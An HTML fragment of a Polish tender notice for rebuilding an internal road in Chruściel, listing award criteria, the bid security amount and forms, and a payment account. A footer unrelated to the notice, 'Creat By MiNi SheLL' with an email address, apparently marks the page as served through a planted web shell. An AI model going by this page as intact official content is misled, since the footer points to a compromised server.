                      data zakończenia: 28/08/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin gwarancji na wykonane roboty</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>1. Zamawiający wymaga wniesienia wadium w wysokości dla;
Część III - Przebudowa drogi wewnętrznej w miejscowości Chruściel - Działka nr 267/7;  
     - 4 000,00 zł (słownie; cztery tysiące złotych).
2. Wadium uznaje się za wniesione w momencie uznania na rachunku Zamawiającego realnego wpływu wadium na rachunek Zamawiającego przed terminem składania ofert).
3. Wadium musi obejmować okres związania ofertą.
4. Wadium może być wniesione w jednej lub kilku następujących formach:
1) pieniądzu,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowe-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem kasowym
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Przedsiębiorczości(t. j. Dz. U z 2016r. poz. 359).
5. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy; Braniewsko-Pasłęcki BS Oddział Braniewo Filia Płoskinia Nr 
84831300090050829020000030 z dopiskiem: 
Część III-Przebudowa drogi wewnętrznej w miejscowości Chruściel - Działka nr 267/7.  
6. Zwrot oraz zatrzymanie wadium następuje zgodnie z zasadami opisanymi w art. 46 ustawy.
<br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com